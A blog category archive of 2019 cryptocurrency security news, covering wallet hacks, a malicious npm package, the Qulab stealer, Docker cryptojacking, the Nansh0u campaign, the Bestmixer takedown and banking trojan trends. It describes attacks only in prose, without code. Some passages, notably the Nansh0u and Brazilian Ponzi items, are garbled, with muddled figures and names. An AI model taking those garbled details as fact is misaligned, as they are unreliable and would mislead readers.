Category Archives: cryptocurrency

[Results] CLB Super Holder Event

Greetings Cloudbric community!

Thank you for your interest in our CLB Super Holder event which has now come to an end.

On exactly June 17, at 4pm KST, the price of CLB sat at 10.4 KRW (approx. $00.0088 USD).

As mentioned, all eligible CLB holders will receive a guaranteed minimum of 5% cumulative bonus distributions (CLB and CLBK tokens) of their total CLB stake as long as they hold the minimum CLB token amount.

Please check the airdrop list and look to see if your email was accepted in alignment with the guidelines.

Airdrop list

Please note that users that had already transferred CLB tokens prior to June 11th, 2019 at 2pm KST will receive an additional 200 CLB bonus airdrop to help mitigate any issues or confusion regarding wallet addresses and transfers.

The winners of the CLB Super Holder event will be issued their CLB tokens by June 24 and will receive their CLBK tokens after Klaytn’s main net launch. More details soon to come.


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post [Results] CLB Super Holder Event appeared first on Cloudbric.

Cryptocurrency wallet GateHub hacked, nearly $10 million worth of Ripple (XRP) stolen

Cryptocurrency wallet service GateHub has warned that over 100 customers have had their ledger wallets hacked and funds stolen.

The post Cryptocurrency wallet GateHub hacked, nearly $10 million worth of Ripple (XRP) stolen appeared first on The State of Security.

Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers

The Cryptocurrency startup Komodo hacked itself to protect the funds of its users and avoid that hackers steal them exploiting a flaw in its Agama wallet.

The story I’m going to tell you is amazing, the Cryptocurrency startup Komodo hacked itself after discovered a backdoor in its Agama wallet.

Komodo’s Agama Wallet allows users to store KMD and BTC cryptocurrencies, but the presence of a backdoor posed a serious risk to them.

Komodo Agama Wallet 1

Once discovered the flaw, the company decided to exploit it to protect the funds, anticipating the hackers and moving them to a secure location.

“Today, Komodo were made aware of an issue with one of the libraries used by the Agama wallet, potentially putting some user funds at risk.” reads a blog post published by the company.

“After discovering the vulnerability, our Cyber Security Team used the same exploit to gain control of a lot of affected seeds and secure the funds at risk.” 

The experts at the company moved around 8 million KMD and 96 BTC from its Agama flawed wallets to safe wallets RSgD2cmm3niFRu2kwwtrEHoHMywJdkbkeF(KMD) and 1GsdquSqABxP2i7ghUjAXdtdujHjVYLgqk (BTC) under their control.

The owners of those wallets that have not been swept, or that have other assets than KMD and BTC, have to move all their funds from Agama to a new address as soon as possible. Komodo provided a list of safe wallets and other information on its support page.

Experts pointed out that the Verus version of Agama wallet is not affected by this vulnerability, its latest version supports Komodo in both lite mode and native mode.

The backdoor in the Agama wallet app was discovered by experts at the security team of the npm JavaScript package repository.

“The attack was carried out by using a pattern that is becoming more and more popular; publishing a “useful” package (electron-native-notify) to npm, waiting until it was in use by the target, and then updating it to include a malicious payload.” reads the post published by the npm, Inc. security team.

Npm security team spotted a supply chain attack, hackers used a malicious update for the electron-native-notify (version 1.1.6) JavaScript library. It included a malicious code designed to steal cryptocurrency wallet seeds and other login passphrases.

“The GitHub user sawlysawly published this commit on Mar 8th which added electron-native-notify^1.1.5 as a dependency to the EasyDEX-GUI application (which is used as part of the Agama wallet).” continues the security team at npm.

The experts discovered that the attackers targeted the Agama cryptocurrency wallet which was using the EasyDEX-GUI application that was loading the now-malicious electron-native-notify library.

The backdoor was added to the electron-native-notify library on March 8, and it was included in the main Agama wallet on April 13, when Komodo released Agama version 0.3.5.

This means that users that logged in to any version of Agama wallet after 13 April likely had their wallet credentials compromised.

The npm experts also published a video that shows how the vulnerable version of Agama wallet sends the private seed associated with a waller to a remote server in the background.

Komodo experts used the same technique to transfer the funds of the company clients to a safe wallet before hackers could have stolen them.

Pierluigi Paganini

(SecurityAffairs – Komodo, hacking)

The post Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers appeared first on Security Affairs.

Cryptocurrency Scammers Uses Youtube For Promotion

Are you a cryptocurrency enthusiast and loves watching Youtube videos about Bitcoins and other cryptocurrencies? If yes, then be very alert about Youtube channels you visit. Youtube, being the home of millions of content creators and online video consumers is teeming with scammers and phishers. Google has for quite some time is now actively taking down the videos hosting malicious links in the description portion of the video and even the entire Youtube channel. However, campaigns in Youtube promoting “Bitcoin generator” programs which claim as an easy way of creating bitcoins painlessly continue to rise one after another.

The Bitcoin generator tool is nothing but an espionage program that steals user information from the computer upon its execution. Videos promoting bitcoin generator website named freebitco.in continue to get re-uploaded on another Youtube channel once Google takes it down. Upon close inspection by researchers, the payload uses the infamous Qulab espionage trojan, which installs itself to Windows under the directory: %AppData%\amd64_microsoft-windows-netio-infrastructure under the file named msaudite.module.exe. The payload once installed in the system is able to gather information from .wallet files (cryptocurrency wallets), gather text information and save it to .txt files, browser persistent cookies, login credentials stored in the cache of Steam, FileZilla and Discord. Qulab trojan is also loaded with the capability to steal the information from the Windows clipboard, then immediately switch it with different data, which is useful when it comes to capturing cryptocurrency transfers.

Bitcoin generator, though using the name of Bitcoin supports the theft of other cryptocurrency aside from BTC. The following cryptocurrencies are also targeted by Bitcoin generator to monitor transactions with:

  • WMZ
  • WME
  • Qtum
  • Litecoin
  • Doge
  • Bytecoin
  • ZCash
  • WMX
  • VIA
  • QIWI
  • Graft
  • Dash
  • Bitcoin Gold
  • Yandex Money
  • WMU
  • Stratis
  • Neo
  • Ethereum
  • Lisk
  • Bitcoin Cash
  • Waves
  • WMR
  • Steam Trade Link
  • Monero
  • Electronium
  • Cardano

An extensive blog post on fumik0.com is posted which provides all the details on how Qulab performs its “magic” of stealing information beyond the scope of this article. According to fumik0.com, a more advanced version of Qulab has more capabilities beyond cryptocurrency wallet theft and other common keylogging techniques. Some of which are:

  • Browser stealing
  • Wallet Clipper
  • FTP creds
  • Discord / Telegram logs
  • Steam (Session / Trade links / 2FA Authenticator by abusing a third party software)
  • Telegram Bot through a proxy
  • Grabber

Qulab is a sophisticated trojan, as it was developed under a combination of modules programmed in Delphi, C, .NET and C++, which fumik0.com calls an exotic malware. Following the template set by AutoIT scripts (sold in the Dark Web), which automates trojan development through code-reuse or code-recycling. Fumik0.com opened a GitHub page where a working proof-of-concept explaining the fundamentals of AutoIT is explained. “These libraries have been written to allow easy integration into your own scripts and are a very valuable resource for any programmer,” explained fumik0.com.

The authors of Qulab provided a module within the malware code for itself to perform a “garbage collection” algorithm to bypass detection. With an entourage of features, Qulab uses a lot of memory, hence such portion of memory cannot be used by the operating system and other programs. With memory capacity reaching its full utilization, Windows will be forced to use the hard drive as virtual memory, which will be felt by end-users as the computer’s performance takes a hit.

Related Resources:

Malicious YouTube ads used to mine cryptocurrency

Scranos Rootkit Auto-Subscribes Users To Selected Youtube Channels

Youtube Video Content Creators and Channel Subscribers Cautioned Of Malicious Posers

The post Cryptocurrency Scammers Uses Youtube For Promotion appeared first on .

Compromised Docker Hosts Use Shodan for Cryptocurrency Mining

Researchers have detected a campaign in which compromised docker hosts use Shodan for carrying out cryptocurrency mining.

Hackers scan for Docker hosts with exposed APIs and use them for cryptocurrency mining, which is done by deploying malicious self-propagating Docker images that are infected with Monero miners and scripts which use Shodan for finding vulnerable targets. Researchers at Trend Micro discovered this campaign after a Docker image that contained a Monero (XMR) cryptocurrency miner binary was deployed on one of their honeypots, set up as part of their efforts to monitor malicious activity aimed at containers, Sergiu Gatlan, security/tech reporter at Bleeping Computer writes, “This type of attack is definitely nothing new seeing that researchers from Imperva discovered a similar campaign abusing the CVE-2019-5736 runc vulnerability to deploy cryptominers during early-March.”

“However, the hackers behind the attacks discovered by Trend Micro now also use scripts designed to scan for more vulnerable machines via Shodan search queries scanning for hosts with the 2375 port open and deploying more infected containers to the new targets after brute-forcing their way,” the Bleeping Computer report further says.

Another independent security researcher who goes by the name Caprico, and researchers at Alibaba Cloud too, have observed this campaign.
A blog post dated May 28, 2019 by the Alibaba Cloud researchers says, “Earlier this month, we detected a mining botnet that deploys malicious Docker containers on victim hosts by exploiting Docker’s remote API unauthorized Access vulnerability. We have named the botnet “Xulu” because it serves as username in the botnet’s mining.”

The blog post further says, “Xulu is not the first botnet case that aims at Docker; yet it differs from other botnets by not scanning other hosts by itself, instead it utilizes OSINT (open-source intelligence) technique and dynamically searches Shodan for lists of possible preys…It also placed its controlling server in the Tor network, which is probably an effort to hide the evil backstage manipulator of the botnet.”

The hackers behind the campaign were using the exposed APIs to execute commands on the Docker hosts; these commands would allow them to manage (start, stop or kill) containers and create new ones also by deploying images from a Docker Hub repository that they control.
The Trend Micro team zeroed in on a Docker Hub repository named zoolu2.

Alfredo Oliveira, Senior Threat Researcher at Trend Micro, writes, “By analyzing the logs and traffic data coming to and from the honeypot, we learned that the container came from a public (and thus accessible) Docker Hub repository named zoolu2. Upon checking and downloading the contents of the repository, we found that it contained nine images comprised of custom-made shells, Python scripts, configuration files, as well as Shodan and cryptocurrency-mining software binaries.”

The Trend Micro blog post further explains, “All the images in the zoolu2 repository contained the binary of a Monero (XMR) cryptocurrency miner. This piqued our interest since we’ve already had experience with containers being deployed as miners. In addition, some of the images contained a Shodan script that lists Docker hosts with exposed APIs, which we surmised was being used to identify suitable targets for further container distribution.”

Docker found and took down the repository containing the infected Docker containers and Shodan too disabled accounts used to access its API. But reports say that one malicious Docker image, which has already been downloaded more than 10,000 times, is still available. There have also been reports that point out that the hackers had used another Docker Hub account to host infected containers. When that account was deactivated, they kept moving the containers to other accounts.

A GitHub user reporting this issue writes, “This image is a worm/botnet/whatever targeting unsecured Docker API instances (port tcp/2375)…It uses Tor to update its mining config and continuously scrapes Shodan for exposed Docker instances (with a hardcoded user/pass which I changed) to infect them as well. It also sets up an SSH server, with a hashed password for the root user (basically a backdoor account).”

The Bleeping computer report explains how it all works. The malicious Docker images, which are automatically deployed using a script that looks for exposed APIs and which also remotely creates malicious containers using Docker commands, also starts an SSH daemon that enables remote communication with the hackers. A custom-built Monero coin-mining binary gets launched in the background. Simultaneously, a scanning process that makes use of a third script looks for more victims using Shodan API.

The report explains further, “The list of vulnerable hosts gets written to an iplist.txt file which is checked for duplicates, with all the new targets also being scanned for existing cryptocurrency-mining containers which will be deleted if found…The entire list of IP addresses is then sent to the campaign operators’ command-and-control servers “to deploy additional containers to other exposed hosts based on the IP list. It then loops to the beginning of the routine stated earlier with a new host.””

Also, Read

Cryptocurrency Mining Service Coinhive Set to Shut Down

Firefox to Offer Users Automatic Protection Against Cryptocurrency Mining Malware

Cyrptocoin Minning Malware On The Rise

The post Compromised Docker Hosts Use Shodan for Cryptocurrency Mining appeared first on .

Nansh0u Miner Attack 50000 MS-SQL, PHPMyAdmin Servers

Chinese hackers and secretly exploited more than 50,000 MS-SQL and PHPMyAdmin for TurtleCoin as part of a large-scale crypto hacking campaign called Nansh0u.

The campaign was discovered in early April and began on 26 February. It focused on servers around the world, including companies from different sectors, with more than 700 victims a day.

According to the Guardicore Labs team which discovered the attacks, “During our investigation, we found 20 versions of malicious payloads, with new payloads created at least once a week and used immediately after their creation time,” and the hackers used “five attack servers and six connect-back servers”.

The Guardicore Labs team attributed this campaign to Chinese operators using multiple indices:

To put the Windows MS-SQL and PHPMyAdmin servers at risk, hackers have used a variety of tools, including a port scanner, an MS SQL brute force tool and a remote execution engine.

With the help of port scanner, they were able to find MS SQL servers by checking the default MS SQL ports were open. These servers would automatically be integrated into the brute force tool, which would attempt to hack the servers with thousands of frequently used credentials.

Once they breach the servers, the Nansh0u campaign operators infect them with 20 different versions of malicious data using an MS-SQL script that downloads and sends user data to vulnerable computers. An elevation of the privilege vulnerability CVE-2014-4113 has been exploited to execute payloads using SYSTEM privileges on infected servers, with each payload eliminated and executed designed as a wrapper for the execution of multiple actions.

As Guardicore researchers noted after analyzing the samples collected through the Global Guardianore sensor network (GGSN) from the attack servers, the wrappers revealed the following:

• Execute the crypto-currency miner;
• Create persistency by writing registry run-keys;
• Protect the miner process from termination using a kernel-mode rootkit;
• Ensure the miner’s continuous execution using a watchdog mechanism.

XMRig and JCE cryptocurrency companies use four data mining pools for TurtleCoin, a confidentiality-oriented cryptocurrency with fast transactions and with all private transactions, provided they are not for public.

Many of the remaining servers on infected user data have also been dropped a kernel mode driver with random names and masked VMProtect code that is not recognized by most AV engines.

The driver also signed a revoked by Verisign certificate from a Chinese company called Hangzhou Hootian Network Technology. It is to “protect processes and prevent the user from closing.

Kernel-mode driver digital signature
It also “contains additional rootkit functionality such as communicating with physical hardware devices and modifying internal Windows process objects that are unused by this particular malware.”

In addition, the kernel-mode driver, which ensures that the remote malware is not interrupted virtually all Windows versions from Windows 7 to Windows 10, including the beta versions support it.

The Guardicore Labs team provides a full list of IOC for this campaign encryption available, including Payload hashes, IP addresses used in attacks and pull Pool domains.

In addition, a PowerShell script is provided. Nansh0u campaign can be viewed on infected computers with the potential for a contaminated server to be traced.

The post Nansh0u Miner Attack 50000 MS-SQL, PHPMyAdmin Servers appeared first on .

Tips to Increase Your Bitcoin Security

Of all the cryptocurrencies available today, Bitcoin definitely is the most popular one. Investors are attracted by the potential value of this cryptocurrency. But let’s remember that whatever gets popular on the internet draws the attention of cybercriminals as well. Thus, Bitcoin, because of its popularity and also because of its potential value, does attract cybercriminals. Hence, it’s important that security measures are adopted to ensure and increase Bitcoin security. Here are some very basic tips that could help you increase your Bitcoin security…

Use a trusted web wallet

Agreed that web wallets are convenient and easy to access. They do enhance your trading experience, making it all very easy for you, but at the same time, it’s to be noted that many web wallets have serious security issues. Cybercriminals regularly seek to exploit web wallet-related vulnerabilities, aiming to lay their hands on users’ cryptocurrency funds. So, it would be good to opt for only trusted web wallets- those that have a good reputation as regards security. You could also think of avoiding web wallets or else you could even store cryptocurrencies in small amounts so that you lose small amounts in the eventuality of a cyberattack.

Opting to keep your bitcoin in cold storage is good

Opting to keep your bitcoin in cold storage ensures better security. Cold storage is nothing but storing bitcoin offline as a security precaution. This could include storing bitcoins on a USB drive or other such data storage medium, on a paper wallet or by using an offline hardware wallet. As a best practice, keep on the server only the amount that is needed to cover anticipated withdrawals. That helps minimize the possibility of an intruder stealing your entire bitcoin reserve in one attack. When your bitcoin reserve is stored on a cold wallet, the transaction can be done only by using private keys that are stored in the cold wallet. Hence, even if your system is malware-infected, it won’t impact transactions that you do from your cold storage.

Always keep your private keys offline

This is important for all wallet owners. Always keep your private keys offline and also refrain from sharing them. The best thing would be to store your private keys on a separate offline device. This would help secure your bitcoins.

Refrain from keeping your cryptos in one place

If you could use separate wallets and not store all your bitcoins in one place, it would ensure better security. You could opt to keep what you need for anticipated spending or trading in your online wallet and the remaining bulk of your funds, as mentioned earlier, in your offline wallet. Whenever you transfer large amounts of bitcoins into your online wallet, make sure whatever remains after the transaction is done is transferred back to your cold wallet. This ensures better safety. Having your bitcoins saved in different locations ensures that you don’t end up losing everything in the eventuality of a hack.

Go for fragmented backups

You should always try to store copies of your back in different secret locations. A fragmented backup in which you divide the backup seed into fragments could help in securing your bitcoins. Your wallet gets an extra layer of security as any attacker targeting your bitcoins would have to look for the fragments.

The other important tips that could help you secure your bitcoins include using a type 2 deterministic wallet (which uses a seed to deterministically create all future private keys) and also to try installing, if possible, Linux for online and offline computers that you use for transferring bitcoin-related data (using a USB drive) from online to offline environments.

Such basic security measures, if adopted, could ensure better security for your bitcoins.

Related Resources:

Fake Fortnite App Installs Hidden Bitcoin Miner

Hackers Attack Crypto Exchange With Bitcoin-Stealing Malware

Hacker Compromised JavaScript Library to Steal Bitcoin funds

Hackers Steal Around $41 Million in Bitcoin from Binance

The post Tips to Increase Your Bitcoin Security appeared first on .

Bitcoin Rewards As Lures? Tale Of The New Generation Malvertising

Remember the malvertising campaigns in the early days where are adverts showing you are the nth visitor, and you have a prize to claim for being the coveted nth visitor on a website? Of course these days the chance of seeing a Flash-based animated advert like that, since Google Chrome itself autoblocks scam-like adverts by default as part of the Google Safe Browsing initiative, which Firefox browser also features. The demise of malvertising through adverts does not end with the anemic Flash-based variants though, as cybercriminals are now using Bitcoins (well, sort of people’s desire for it) to convince people when they visit a dodgy website controlled by them.

Imagine that a malvertising website offers its visitor a $30 worth of Bitcoin, not that huge but with enough “visits” may enable someone to afford some stuff in eBay or an Amazon gift card-level of a prize. However, this malvertising website installs keyloggers, banking trojans or ransomware which will harm the victim at a later time. Another similar but unrelated number of websites offer referral prize in Ethereum (another cryptocurrency alternative to Bitcoin), with one website claiming that successful users who can refer 1,000 visitors to the website will earn him/her $750 worth of Ethereum.

Both websites offer a download they call “Bitcoin Collector” which claims to be an easy mining program for Windows, which will provide “free Bitcoins” for the user, but instead caused the computer to mine cryptocurrency instead for the author at the expense of the user. One of the most common trojan horse of this category is one named BotCollector.exe, often comes from a .zip file downloaded from a malvertising website.

“When you execute the included BotCollector.exe, it will launch a program called ‘Freebitco.in – Bot’ that does not appear to do much. In reality, though, this is a Trojan that pretends to be a bitcoin generator but simply launches a malware payload. It does this by copying a file at geobaze\patch\logo.png to logo.exe and executing it (planting itself deep into the Windows operating system)”, explained Lawrence Abrams of Bleepingcomputer.com.

BotCollector.exe was previously observed to carry a different behavior, it used to be the main payload for the ransomware named “Marozka Tear”. Being unsophisticated ransomware, Marozka Tear’s author used a public free Gmail account (india2lock@gmail.com) in order for its victim to contact him/her for the payment of the ransom instead of having a sophisticated “shopping cart” for collecting payments. The Bleepingcomputer team stopped the ransomware from being profitable with their release of a free decryptor program that reverses the encryption of user files without paying Marozka Tear’s author.

At the time of this writing, the two hidden payloads of the new variant of BotCollector that have not yet fully dissected by the BleepingComputer team. But initial checks show it can be compared to a full-blown espionage-type of malware that can record keystrokes, take screenshots, capture browser history, sends any user files to its author and even the capability to copy the information of a crypto wallet.

Also, Read:

Hackers Steal Around $41 Million in Bitcoin from Binance

South Korean Bitcoin Exchange Bithumb Hacked

Hacker Stole 200+ Bitcoin from Electrum Wallet

Is Bitcoin Just A Bubble That Will Burst In 2019

Using BitCoins: The Basics

The post Bitcoin Rewards As Lures? Tale Of The New Generation Malvertising appeared first on .

Police seized Bestmixer, the mixing service washed at least $200 million in a year

European law enforcement seized and shut down Bestmixer.io for reportedly laundering over $200 million in cryptocurrency.

This week the Europol has dealt another blow to cybercrime, the European police along with the Dutch Fiscal Information and Investigation Service (FIOD), and Luxembourg authorities shut down Bestmixer.io, on one of the world’s leading cryptocurrency mixing services.

A mixing service (aka cryptocurrency tumbler) mixes potentially identifiable or ‘tainted’ cryptocurrency funds with others, making hard to trail back to the fund’s original source. Operators behind mixing services maintain a fee from the original funds.

“A mixing service will cut up a sum of Bitcoins into hundreds of smaller transactions and mixes different transactions from other sources for obfuscation and will pump out the input amount, minus a fee, to a certain output address. Mixing Bitcoins that are obtained legally is not a crime but, other than the mathematical exercise, there no real benefit to it.” reads a blog post published by McAfee.

“The legality changes when a mixing service advertises itself as a success method to avoid various anti-money laundering policies via anonymity. This is actively offering a money laundering service.”

Back in 2018, FIOD launched an investigation, with the support of the security firm McAfee, that led in the seizure of six servers in the Netherlands and Luxembourg.

BestMixer.io

“Today, the Dutch Fiscal Information and Investigation Service (FIOD), in close cooperation with Europol and the authorities in Luxembourg, clamped down on one of the world’s leading cryptocurrency mixing service Bestmixer.io.” reads the press release published by the Europol.

Bestmixer.io

Bestmixer.io was launched in May 2018, it offered services for mixing the cryptocurrencies bitcoins, bitcoin cash, and litecoins.

Immediately after the launch, the police began investigating the activity of the mixing service.

The numbers behind the service are impressive, it reached a turnover of at least $200 million (approx. 27,000 bitcoins) in 12 months. Of course, the mixing service ensured the total anonymity of its customers.

“The investigation so far into this case has shown that many of the mixed cryptocurrencies on Bestmixer.io had a criminal origin or destination,” continues the Europol. “In these cases, the mixer was probably used to conceal and launder criminal flows of money.”

The Dutch FIOD is investigating data related to all the interactions on this service in the past year. Investigators obtained IP-addresses, transaction details, bitcoin addresses and chat messages associated with the interactions.

“This information will now be analysed by the FIOD in cooperation with Europol and intelligence packages will be shared with other countries.” concludes the press release.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Bestmixer .io, cybercrime)

The post Police seized Bestmixer, the mixing service washed at least $200 million in a year appeared first on Security Affairs.

Banking Trojan Infections Dominated In Q1 2019

Kaspersky Lab, the research arm of Kaspersky, an antivirus vendor has revealed that the first quarter of 2019 saw the double growth of banking trojan cases globally compared to the last quarter of 2018. Cybercriminals have switched their focus on banking trojan after the shutdown of the very popular Coinhive cryptojacking service last March 2019. With the focus towards profit, ransomware infections are slowly declining while operating system mitigations are lessening cryptocurrency malware’s infection vectors.

“In Q1 2019, Kaspersky Lab detected a 58% increase in modifications of banking Trojan families, used in attacks on 312,235 unique users. Banking Trojans grew not only in the number of different samples detected, but their share of the threat landscape increased as well. In Q4 2018, mobile banking Trojans accounted for 1.85% of all mobile malware; in Q1 2019, their share reached 3.24%,” explained Victor Chebyshev, Kaspersky’s Lead of Research Development team.

Banking trojans of 2019 are highly modular, with new features added on-the-fly by their respective authors. Kaspersky detected that for the first quarter of 2019 alone, 29,841 variants of banking trojans were discovered. That is a sizable increase from just 18,501 discovered variants in the 4th quarter of 2018.

“As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected,” added Chebyshev.

Kaspersky is expecting that the mobile platform is the segment that will be mostly hit. This is given because users today tend to perform more computing with their mobile device compared to a full fledged computer.

“The rapid rise of mobile financial malware is a troubling sign, especially since we see how criminals are perfecting their distribution mechanisms. For example, a recent tendency is to hide the banking Trojan in a dropper – the shell that is supposed to fly to the device under the security radar, releasing the malicious part only upon arrival,” concluded Chebyshev.

Also, Read:

The All-New Kronos Banking Trojan Discovered

Multimedia Editing Software Hacked to Spread Banking Trojan

Redaman Banking Trojan of 2015 Resurrects, Targets Russian Email Users

How Protect Your Android Device From The Mobile Banking Trojan

The post Banking Trojan Infections Dominated In Q1 2019 appeared first on .

Cyber News Rundown: Banking Trojan Closes Ohio Schools

Reading Time: ~2 min.

Banking Trojan Shuts Down Ohio School District

After the discovery of the banking Trojan known as Trickbot, an Ohio school district was forced to cancel school since they were unable to fully disinfect the networks before classes resumed the following Monday. Preliminary reports have concluded that no students were responsible for the attack, as it appears to have started its data-gathering on a computer belonging to the district treasurer’s office. In order for classes to resume normally, the IT staff for the district had to re-format nearly 1,000 affected computers. 

GetCrypt Spreading Through RIG Exploit Kits

Another ransomware variant, GetCrypt, has been spotted in the wild that spreads itself across systems by redirecting visitors to a compromised website to a separate page hosting an exploit kit. After checking for several Eastern European languages, the ransomware begins encrypting all files on the system and displays a standard ransom note. In addition to removing all available shadow copies from the computer, GetCrypt also appends all encrypted files with a randomized, four-character string based on the CPUID of the device itself.

Google Assistant Logs All Online Purchases

It was recently discovered that Google’s Assistant, released last year, keeps a log of all online purchases for which a receipt was sent to the user’s Gmail account. The “Payments” page on a user’s Google account shows transactions, flight and hotel reservations, and other purchases made up to several years prior, even showing the cost, date, and time of the purchase.

Forbes Joins List of Magecart Victims

It was revealed late last week that Forbes had fallen victim to a Magecart attack possibly affecting anyone who made a purchase on the site during that time. Fortunately, the researcher who discovered the attack quickly notified both Forbes and the domain owner, resulting in a swift removal of the malicious payment card skimmer from the highly-trafficked site. It’s likely that Forbes became a victim after another vendor in their supply chain was compromised.

Australian IT Contractor Arrested for Cryptomining

An IT contractor working in Australia was arrested after being caught running cryptomining software on government-owned computers, which netted him over $9,000 in cryptocurrency. The charges encompass misuse of government systems by making modifications to critical functions and security measures for personal gain while in a position of trust. By making these changes, this contractor could have exposed a much larger portion of the network to malicious actors who take advantage of misconfigured settings to access company data.

The post Cyber News Rundown: Banking Trojan Closes Ohio Schools appeared first on Webroot Blog.

Fake Cryptocurrency Scammed 55,000 investors for over $200 million

The cryptocurrency crime cartel has been shut down after more than 55,000 investors were conned for more than $ 200 million. Brazilian police arrested 10 people suspected of operating an $ 850 million ($ 210 million) pyramid cryptocurrency scheme. This was reported by local media such as Correido Do Povo on May 21st.

As part of the Egyptian operation, to unveil unapproved financial schemes, the Brazilian tax authorities, together with the police, organized a crackdown against the figures on which the transaction was based and raised funds from 55,000 investors.

They attracted victims with the promise of a 15% payment the first month after investing in the crypto scheme.

In total, the investigation involved 13 individuals and five legal entities.

“The problem with this company is that it was acting without the authorization,” Correido Do Povo quotes Delegate Eduardo Dalmolin Boliis of the federal police’s Office of Corruption and Financial Crimes as saying.

On the basis of a traditional financial pyramid, seizures of the assets of those involved showed that the company could not honor all the withdrawals of its investors at the same time.

They also invested in luxury goods, including 30 cars and gems, which were subsequently confiscated.

The news comes in the same week when the United States is acting against a Ponzi scheme linked to a cryptocurrency allegedly backed by diamonds. In this case, the network operators would have persuaded domestic and foreign customers spend about $ 30 million over several years.

The use of cryptocurrency is not illegal in Brazil. Police are trying to repeat the impetus for the raid on the contracts, which is based on the lack of legality of the company.

Related Resources:

The Impact of Cryptocurrency Attacks on Cryptocurrency Exchange

4 Effective Ways on How to Prevent Cryptocurrency Mining Infection

Macos Malware Targets Cryptocurrency Exchanges

Cryptocurrency Mining Service Coinhive Set to Shut Down

The post Fake Cryptocurrency Scammed 55,000 investors for over $200 million appeared first on .

Ireland And Its Evolving Cybersecurity Issues

Ireland in 2018 experienced a huge decline of malware infection, most especially the lesser cases of ransomware compared to 2017. The European country of almost 5 million people is mirroring the global trend of cybersecurity issues, as cybercriminals are heavily transitioning from the disruptive and destructive ransomware to a silent yet very profitable phishing and cryptojacking. Ireland recorded in 2018 just 1.26% of monthly infection rate, which is one of the lowest in the European region and one of the lowest globally.

This is a sharp contrast to 2017 when millions of computers worldwide were heavily infected by ransomware, more particularly the likes of WannaCry and NoPetya. Cryptojacking is easy to deploy and very difficult to detect, as it is basically a program that consumes CPU/GPU resources like the rest of the programs in a computing device. But the consumed CPU/GPU resources does not produce a tangible output like a typical benign program but rather designed to compute for crypto-hashes in the attempt to mine cryptocurrency.

“While we have seen a welcome drop in ransomware and malware attacks, it would be a mistake to assume the level of the cyber threat to Irish organizations has also decreased. We are seeing major behavioral change amongst criminal hackers, who want access to a victim’s computer and an organization’s network to access data, but also use their computing power to mine for cryptocurrency. This is about playing the long game and exploiting people’s lack of training and understanding when it comes to cybercrime. Microsoft’s analysts predict phishing will continue to be an issue for the foreseeable future for that reason,” explained Des Ryan, Microsoft Ireland’s Solutions Director.

To add insult to injury, Microsoft underscored that many private and public entities in the country lack adequate staff training when it comes to cybersecurity. The vulnerable companies also practice lax IT security protocols, a trait that opens an opportunity for something that goes wrong to grow exponentially.

Also, Read:

5 Fundamental Cybersecurity Issues With Email

Will AI Solve the Gaming Industry’s Cybersecurity Issues?

How Healthcare Organizations Can Solve Cybersecurity Issues

Importance of Changes in Corporate Mindset in Preventing CyberSecurity Issues

Orange’s Acquisition of SecureLink, Set To Expand Cybersecurity Market

The post Ireland And Its Evolving Cybersecurity Issues appeared first on .

Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware

Reading Time: ~2 min.

WhatsApp Exploited to Install Spyware through Calls

A serious flaw has been discovered in the messaging app WhatsApp that would allow an attacker to install spyware on a victim’s device by manipulating the packets being sent during the call. Further disguising the attack, the malicious software could be installed without the victim answering the call, and with access to the device the attacker could also delete the call log. Fortunately, the Facebook-owned app was quick to respond and quickly released an update for affected versions. 

SIM Swapping Group Officially Charged

Nine men in their teens and 20s have been arrested and charged for a SIM-swapping operation that netted the group over $2 million in stolen cryptocurrency. The group operated by illicitly gaining access to phone accounts by having the phone swapped to a SIM card in their control. The group would then fraudulently access cryptocurrency accounts by bypassing 2-factor authentication, since login codes were sent to devices under their control. Three of the group were former telecom employees with access to the systems needed to execute the scam.

Web Trust Seal Injected with Keylogger

A recent announcement revealed that scripts for the “Trust Seals” provided by Best of the Web to highly-rated websites were compromised and redesigned to capture keystrokes from site visitors. While Best of the Web was quick to resolve the issue, at least 100 sites are still linking customers to the compromised seals. This type of supply chain attack has risen in popularity recently. Hackers have been seen injecting payment stealing malware into several large online retailer’s websites since the beginning of the year.

Fast Retailing Data Breach

The online vendor Fast Retailing is currently investigating a data breach that gave attackers full access to nearly half a million customer accounts for two of the brand’s online stores. The attack took place within the last three weeks and targeted payment information with names and addresses for customers of UNIQLO Japan and GU Japan. Fast Retailing has since forced a password reset for all online customers and delivered emails with further information for those affected by the attack.

Data Leak in Linksys Routers

Last week researchers discovered a flaw in over 25,000 Linksys routers that could give attackers access to not only the device’s MAC address, but also device names and other critical settings that could compromise the security of anyone using the router. Additionally, by identifying the device’s IP address, attackers could even use geolocation to gauge the approximate location of the exploited device, all without authentication.

The post Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware appeared first on Webroot Blog.

Smashing Security #128: Shackled ankles, photo scrapes, and SIM card swaps

A bad software update causes big headaches for Dutch police, but brings temporary freedom to criminals. SIM swaps are in the news again as fraudsters steal millions. And does your cloud photo storage service have a dirty little secret?

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Rip Off Britain’s David McClelland.

This Week in Security News: BEC Attacks and Botnet Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the prevalence and impact of BEC attacks. Also, find out how botnet malware can perform remote code execution, DDoS attacks and cryptocurrency mining.

Read on:

Tech Support Scam Employs New Trick by Using Iframe to Freeze Browsers

Trend Micro discovered a new technical support scam (TSS) campaign that makes use of iframe in combination with basic pop-up authentication to freeze a user’s browser. 

Cybersecurity Pros Could Work for Multiple Agencies Under Bill Passed by Senate

Skilled federal cybersecurity workers could be rotated among civilian agencies under bipartisan legislation the Senate passed to help fill specific gaps in the workforce. 

New Cybersecurity Report Warns CIOs — ‘If You’re Breached Or Hacked, It’s Your Own Fault’

